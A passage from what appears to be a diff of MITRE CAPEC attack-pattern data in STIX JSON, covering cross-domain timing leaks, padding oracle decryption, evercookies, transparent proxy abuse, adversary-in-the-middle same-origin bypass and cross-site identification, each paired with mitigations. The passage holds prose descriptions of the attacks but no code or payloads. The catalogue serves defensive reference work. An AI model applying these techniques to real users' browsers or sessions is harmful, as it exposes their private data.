", + "x_capec_extended_description": "\n For GET requests an attacker could for instance leverage the \"img\" tag in conjunction with \"onload() / onerror()\" javascript events. For the POST requests, an attacker could leverage the \"iframe\" element and leverage the \"onload()\" event. There is nothing in the current browser security model that prevents an attacker to use these methods to time responses to the attackers' cross domain requests. The timing for these responses leaks information. For instance, if a victim has an active session with their online e-mail account, an attacker could issue search requests in the victim's mailbox. While the attacker is not able to view the responses, based on the timings of the responses, the attacker could ask yes / no questions as to the content of victim's e-mails, who the victim e-mailed, when, etc. This is but one example; There are other scenarios where an attacker could infer potentially sensitive information from cross domain requests by timing the responses while asking the right questions that leak information.\n ", + "x_capec_prerequisites": [ + "Ability to issue GET / POST requests cross domainJava Script is enabled in the victim's browserThe victim has an active session with the site from which the attacker would like to receive informationThe victim's site does not protect search functionality with cross site request forgery (CSRF) protection" + ], + "x_capec_resources_required": [ + "Ability to issue GET / POST requests cross domain" + ], + "x_capec_skills_required": { + "Low": "Some knowledge of Java Script" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: The victim's site could protect all potentially sensitive functionality (e.g. search functions) with cross site request forgery (CSRF) protection and not perform any work on behalf of forged requests", + "id": "course-of-action--f46f8204-a5a5-4d0b-927d-1204f8d80a35", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-462-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a8f742a2-4f13-496c-ae38-b401f66aa531", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f46f8204-a5a5-4d0b-927d-1204f8d80a35", + "target_ref": "attack-pattern--5871f734-1898-4509-860c-f418cdf6b2ac", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: The browser's security model could be fixed to not leak timing information for cross domain requests", + "id": "course-of-action--91807008-54b1-456b-8522-5ba6ea9ca3b5", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-462-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6c073f92-1bbc-43d5-92cf-3df1be18d378", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--91807008-54b1-456b-8522-5ba6ea9ca3b5", + "target_ref": "attack-pattern--5871f734-1898-4509-860c-f418cdf6b2ac", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary is able to efficiently decrypt data without knowing the decryption key if a target system leaks data on whether or not a padding error happened while decrypting the ciphertext. A target system that leaks this type of information becomes the padding oracle and an adversary is able to make use of that oracle to efficiently decrypt data without knowing the decryption key by issuing on average 128*b calls to the padding oracle (where b is the number of bytes in the ciphertext block). In addition to performing decryption, an adversary is also able to produce valid ciphertexts (i.e., perform encryption) by using the padding oracle, all without knowing the encryption key.", + "external_references": [ + { + "external_id": "CAPEC-463", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/463.html" + }, + { + "external_id": "CWE-209", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/209.html" + }, + { + "external_id": "CWE-514", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/514.html" + }, + { + "external_id": "CWE-649", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/649.html" + }, + { + "external_id": "CWE-347", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/347.html" + }, + { + "external_id": "CWE-354", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/354.html" + }, + { + "external_id": "CWE-696", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/696.html" + }, + { + "description": "Juliano Rizzo, Thai Duong, Practical Padding Oracle Attacks, 2010--05---25", + "external_id": "REF-400", + "source_name": "reference_from_CAPEC", + "url": "https://www.usenix.org/legacy/events/woot10/tech/full_papers/Rizzo.pdf" + } + ], + "id": "attack-pattern--63048cb5-6d42-4fa2-a0e1-eeff2ef2a34d", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Padding Oracle Crypto Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--f1336271-5f27-40de-a61b-aba6572d120f" + ], + "x_capec_domains": [ + "Communications" + ], + "x_capec_example_instances": [ + "An adversary sends a request containing ciphertext to the target system. Due to the browser's same origin policy, the adversary is not able to see the response directly, but can use cross-domain information leak techniques to still get the information needed (i.e., information on whether or not a padding error has occurred). This can be done using \"img\" tag plus the onerror()/onload() events. The adversary's JavaScript can make web browsers to load an image on the target site, and know if the image is loaded or not. This is 1-bit information needed for the padding oracle attack to work: if the image is loaded, then it is valid padding, otherwise it is not." + ], + "x_capec_extended_description": "\n Any cryptosystem can be vulnerable to padding oracle attacks if the encrypted messages are not authenticated to ensure their validity prior to decryption, and then the information about padding error is leaked to the adversary. This attack technique may be used, for instance, to break CAPTCHA systems or decrypt/modify state information stored in client side objects (e.g., hidden fields or cookies). This attack technique is a side-channel attack on the cryptosystem that uses a data leak from an improperly implemented decryption routine to completely subvert the cryptosystem. The one bit of information that tells the adversary whether a padding error during decryption has occurred, in whatever form it comes, is sufficient for the adversary to break the cryptosystem. That bit of information can come in a form of an explicit error message about a padding error, a returned blank page, or even the server taking longer to respond (a timing attack). This attack can be launched cross domain where an adversary is able to use cross-domain information leaks to get the bits of information from the padding oracle from a target system / service with which the victim is communicating.\n ", + "x_capec_prerequisites": [ + "The decryption routine does not properly authenticate the message / does not verify its integrity prior to performing the decryption operation", + "The target system leaks data (in some way) on whether a padding error has occurred when attempting to decrypt the ciphertext.", + "The padding oracle remains available for enough time / for as many requests as needed for the adversary to decrypt the ciphertext." + ], + "x_capec_resources_required": [ + "\n Ability to detect instances where a target system is vulnerable to an oracle padding attack\n Sufficient cryptography knowledge and tools needed to take advantage of the presence of the padding oracle to perform decryption / encryption of data without a key\n " + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use a message authentication code (MAC) or another mechanism to perform verification of message authenticity / integrity prior to decryption", + "id": "course-of-action--e62691da-d711-47e8-8c82-b97dcb9b3a05", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-463-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a67f1d51-adca-411e-89d1-92f674949ad3", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e62691da-d711-47e8-8c82-b97dcb9b3a05", + "target_ref": "attack-pattern--63048cb5-6d42-4fa2-a0e1-eeff2ef2a34d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Do not leak information back to the user as to any cryptography (e.g., padding) encountered during decryption.", + "id": "course-of-action--330dc21b-bad8-4391-98c9-c29f84c83208", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-463-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4c01803b-7af5-4c55-98ce-633b944b0847", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--330dc21b-bad8-4391-98c9-c29f84c83208", + "target_ref": "attack-pattern--63048cb5-6d42-4fa2-a0e1-eeff2ef2a34d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker creates a very persistent cookie that stays present even after the user thinks it has been removed. The cookie is stored on the victim's machine in over ten places. When the victim clears the cookie cache via traditional means inside the browser, that operation removes the cookie from certain places but not others. The malicious code then replicates the cookie from all of the places where it was not deleted to all of the possible storage locations once again. So the victim again has the cookie in all of the original storage locations. In other words, failure to delete the cookie in even one location will result in the cookie's resurrection everywhere. The evercookie will also persist across different browsers because certain stores (e.g., Local Shared Objects) are shared between different browsers.", + "external_references": [ + { + "external_id": "CAPEC-464", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/464.html" + }, + { + "external_id": "CWE-359", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/359.html" + }, + { + "description": "Forge Web Credentials: Web Cookies", + "external_id": "T1606.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1606/001" + }, + { + "description": "Samy Kamkar, Evercookie, 2010--09---09", + "external_id": "REF-401", + "source_name": "reference_from_CAPEC", + "url": "http://samy.pl/evercookie/" + } + ], + "id": "attack-pattern--ed57f38c-2f0c-47ad-a6e2-16932fde978f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Evercookie", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--ec382da0-af49-489b-bca1-a555d48b7ce3" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n The places a persistent cookie is stored on a victim's machine include: Standard HTTP Cookies, Local Shared Objects (Flash Cookies), Silverlight Isolated Storage, Storing cookies in RGB values of auto-generated, force-cached, PNGs using HTML5 Canvas tag to read pixels (cookies) back out, Storing cookies in Web History, Storing cookies in HTTP ETags, Storing cookies in Web cache, window.name caching, Internet Explorer userData storage, HTML5 Session Storage, HTML5 Local Storage, HTML5 Global Storage, HTML5 Database Storage via SQLite, among others.\n ", + "x_capec_prerequisites": [ + "The victim's browser is not configured to reject all cookiesThe victim visits a website that serves the attackers' evercookie" + ], + "x_capec_resources_required": [ + "Evercookie source code" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Browser's design needs to be changed to limit where cookies can be stored on the client side and provide an option to clear these cookies in all places, as well as another option to stop these cookies from being written in the first place.", + "id": "course-of-action--613f9459-29ce-43e4-91dd-68f4e6148ef6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-464-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e1626045-707b-4f32-995a-db4309834849", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--613f9459-29ce-43e4-91dd-68f4e6148ef6", + "target_ref": "attack-pattern--ed57f38c-2f0c-47ad-a6e2-16932fde978f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Safari browser's private browsing mode is currently effective against evercookies.", + "id": "course-of-action--252ad1a2-1f99-45a1-a6b1-8ed47af8a5c5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-464-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8204979e-c9d8-4eee-a37d-f28d5d01c12e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--252ad1a2-1f99-45a1-a6b1-8ed47af8a5c5", + "target_ref": "attack-pattern--ed57f38c-2f0c-47ad-a6e2-16932fde978f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "A transparent proxy serves as an intermediate between the client and the internet at large. It intercepts all requests originating from the client and forwards them to the correct location. The proxy also intercepts all responses to the client and forwards these to the client. All of this is done in a manner transparent to the client.", + "external_references": [ + { + "external_id": "CAPEC-465", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/465.html" + }, + { + "external_id": "CWE-441", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/441.html" + }, + { + "description": "Proxy: Internal Proxy", + "external_id": "T1090.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1090/001" + }, + { + "description": "Robert Auger, Socket Capable Browser Plugins Result In Transparent Proxy Abuse, 2009", + "external_id": "REF-402", + "source_name": "reference_from_CAPEC", + "url": "http://www.thesecuritypractice.com/the_security_practice/TransparentProxyAbuse.pdf" + } + ], + "id": "attack-pattern--2b6e94c6-26d0-489c-989c-9f4307348c42", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Transparent Proxy Abuse", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--ec382da0-af49-489b-bca1-a555d48b7ce3" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n Transparent proxies are often used by enterprises and ISPs. For requests originating at the client transparent proxies need to figure out the final destination of the client's data packet. Two ways are available to do that: either by looking at the layer three (network) IP address or by examining layer seven (application) HTTP header destination. A browser has same origin policy that typically prevents scripts coming from one domain initiating requests to other websites from which they did not come. To circumvent that, however, malicious Flash or an Applet that is executing in the user's browser can attempt to create a cross-domain socket connection from the client to the remote domain. The transparent proxy will examine the HTTP header of the request and direct it to the remote site thereby partially bypassing the browser's same origin policy. This can happen if the transparent proxy uses the HTTP host header information for addressing rather than the IP address information at the network layer. This attack allows malicious scripts inside the victim's browser to issue cross-domain requests to any hosts accessible to the transparent proxy.\n ", + "x_capec_prerequisites": [ + "Transparent proxy is usedVulnerable configuration of network topology involving the transparent proxy (e.g., no NAT happening between the client and the proxy)Execution of malicious Flash or Applet in the victim's browser" + ], + "x_capec_skills_required": { + "Medium": "Creating malicious Flash or Applet to open a cross-domain socket connection to a remote system" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Ensure that the transparent proxy uses an actual network layer IP address for routing requests. On the transparent proxy, disable the use of routing based on address information in the HTTP host header.", + "id": "course-of-action--d939e9ad-f3d3-4c25-8ec4-fd98a3ffed73", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-465-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9ac63888-5744-4d6d-adf1-0adf39beb786", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d939e9ad-f3d3-4c25-8ec4-fd98a3ffed73", + "target_ref": "attack-pattern--2b6e94c6-26d0-489c-989c-9f4307348c42", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Disable in the browser the execution of Java Script, Flash, SilverLight, etc.", + "id": "course-of-action--e6df32f5-31e9-467d-bbd7-4146d1870ef4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-465-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--60c4dab5-4f4b-44f2-9098-04dc6db7b9a4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e6df32f5-31e9-467d-bbd7-4146d1870ef4", + "target_ref": "attack-pattern--2b6e94c6-26d0-489c-989c-9f4307348c42", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker leverages an adversary in the middle attack (CAPEC-94) in order to bypass the same origin policy protection in the victim's browser. This active adversary in the middle attack could be launched, for instance, when the victim is connected to a public WIFI hot spot. An attacker is able to intercept requests and responses between the victim's browser and some non-sensitive website that does not use TLS.", + "external_references": [ + { + "external_id": "CAPEC-466", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/466.html" + }, + { + "external_id": "CWE-300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html" + }, + { + "description": "Roi Saltzman, Adi Sharabani, Active Man in the Middle Attacks, 2009--02---02, IBM Rational Application Security Group", + "external_id": "REF-403", + "source_name": "reference_from_CAPEC", + "url": "http://blog.watchfire.com/wfblog/2009/02/active-man-in-the-middle-attacks.html" + } + ], + "id": "attack-pattern--797a5be6-23ff-41bb-be85-51a9976867dd", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Leveraging Active Adversary in the Middle Attacks to Bypass Same Origin Policy", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_extended_description": "\n When an attacker intercepts a response bound to the victim, an attacker adds an iFrame (which is possibly invisible) to the response referencing some domain with sensitive functionality and forwards the response to the victim. The victim's browser than automatically initiates an unauthorized request to the site with sensitive functionality. The same origin policy would prevent making these requests to a site other than the one from which the Java Script came, but the attacker once again uses active adversary in the middle to intercept these automatic requests and redirect them to the domain / service with sensitive functionality. Any persistent cookies that the victim has in their browser would be used for these unauthorized requests. The attacker thus actively directs the victim to a site with sensitive functionality. When the site with sensitive functionality responds back to the victim's request, an active adversary in the middle attacker intercepts these responses, injects their own malicious Java Script into these responses, and forwards to the victim's browser. In the victim's browser, that Java Script executes under the restrictions of the site with sensitive functionality and can be used to continue to interact with the sensitive site. So an attacker can execute scripts within the victim's browser on any domains the attacker desires. The attacker is able to use this technique to steal cookies from the victim's browser for whatever site the attacker wants. This applies to both persistent cookies and HTTP only cookies (unlike traditional XSS attacks). An attacker is also able to use this technique to steal authentication credentials for sites that only encrypt the login form, but do not require a secure channel for the initial request to get to the page with the login form. Further the attacker is also able to steal any autocompletion information. This attack pattern can also be used to enable session fixation and cache poisoning attacks. Additional attacks can be enabled as well.\n ", + "x_capec_prerequisites": [ + "The victim and the attacker are both in an environment where an active adversary in the middle attack is possible (e.g., public WIFI hot spot)The victim visits at least one website that does not use TLS / SSL" + ], + "x_capec_skills_required": { + "Low": "Ability to intercept and modify requests / responses", + "Medium": "Solid understanding of the HTTP protocol" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Tunnel communications through a secure proxy", + "id": "course-of-action--d80b15df-ac31-4f96-a44b-854eae42d178", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-466-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ac76aec8-ae77-4b13-ae78-40f3c080cb27", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d80b15df-ac31-4f96-a44b-854eae42d178", + "target_ref": "attack-pattern--797a5be6-23ff-41bb-be85-51a9976867dd", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Trust level separation for privileged / non privileged interactions (e.g., two different browsers, two different users, two different operating systems, two different virtual machines)", + "id": "course-of-action--b3cd2e0b-e09e-426b-b06b-018ee62ab500", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-466-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--27a38eca-f7d9-4b5e-b966-8e6d36a9dce2", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b3cd2e0b-e09e-426b-b06b-018ee62ab500", + "target_ref": "attack-pattern--797a5be6-23ff-41bb-be85-51a9976867dd", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker harvests identifying information about a victim via an active session that the victim's browser has with a social networking site. A victim may have the social networking site open in one tab or perhaps is simply using the \"remember me\" feature to keep their session with the social networking site active. An attacker induces a payload to execute in the victim's browser that transparently to the victim initiates a request to the social networking site (e.g., via available social network site APIs) to retrieve identifying information about a victim. While some of this information may be public, the attacker is able to harvest this information in context and may use it for further attacks on the user (e.g., spear phishing).", + "external_references": [ + { + "external_id": "CAPEC-467", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/467.html" + }, + { + "external_id": "CWE-352", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/352.html" + }, + { + "external_id": "CWE-359", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/359.html" + }, + { + "description": "Ronen, Cross Site Identification - or - How your social network might expose you when you least expect it, 2009--12---27", + "external_id": "REF-404", + "source_name": "reference_from_CAPEC", + "url": "http://blog.quaji.com/2009/12/out-of-context-information-disclosure.html" + } + ], + "id": "attack-pattern--c50d5a35-0010-422d-b6f7-d4b963c9bad4", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Cross Site Identification", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An attacker may post a malicious posting that contains an image with an embedded link. The link actually requests identifying information from the social networking site. A victim who views the malicious posting in their browser will have sent identifying information to the attacker, as long as the victim had an active session with the social networking site." + ], + "x_capec_extended_description": "\n There are many other ways in which the attacker may get the payload to execute in the victim's browser mainly by finding a way to hide it in some reputable site that the victim visits. The attacker could also send the link to the victim in an e-mail and trick the victim into clicking on the link. This attack is basically a cross site request forgery attack with two main differences. First, there is no action that is performed on behalf of the user aside from harvesting information. So standard CSRF protection may not work in this situation. Second, what is important in this attack pattern is the nature of the data being harvested, which is identifying information that can be obtained and used in context. This real time harvesting of identifying information can be used as a prelude for launching real time targeted social engineering attacks on the victim.\n ", + "x_capec_prerequisites": [ + "The victim has an active session with the social networking site." + ], + "x_capec_skills_required": { + "High": "An attacker should be able to create a payload and deliver it to the victim's browser.", + "Medium": "An attacker needs to know how to interact with various social networking sites (e.g., via available APIs) to request information and how to send the harvested data back to the attacker." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Usage: Users should always explicitly log out from the social networking sites when done using them.", + "id": "course-of-action--af4647f0-e80a-49ba-a16d-3c064e63c678", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-467-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--57332d9a-c39c-4f6b-b1ce-569f45f621b8", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--af4647f0-e80a-49ba-a16d-3c064e63c678", + "target_ref": "attack-pattern--c50d5a35-0010-422d-b6f7-d4b963c9bad4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Usage: Users should not open other tabs in the browser when using a social networking site.", + "id": "course-of-action--8127e61d-3ccd-4866-bd76-59c159eeeefe", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-467-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5bb90021-f385-4a44-b27b-cecb4dfc0580", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8127e61d-3ccd-4866-bd76-59c159eeeefe", + "target_ref": "attack-pattern--c50d5a35-0010-422d-b6f7-d4b963c9bad4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker makes use of Cascading Style Sheets (CSS) injection to steal data cross domain from the victim's browser. The attack works by abusing the standards relating to loading of CSS: 1. Send cookies on any load of CSS (including cross-domain) 2. When parsing returned CSS ignore all data that does not make sense before a valid CSS descriptor is found by the CSS parser.", + "external_references": [ + { + "external_id": "CAPEC-468", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/468.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "external_id": "CWE-149", + "source_name": "cwe", + "url": 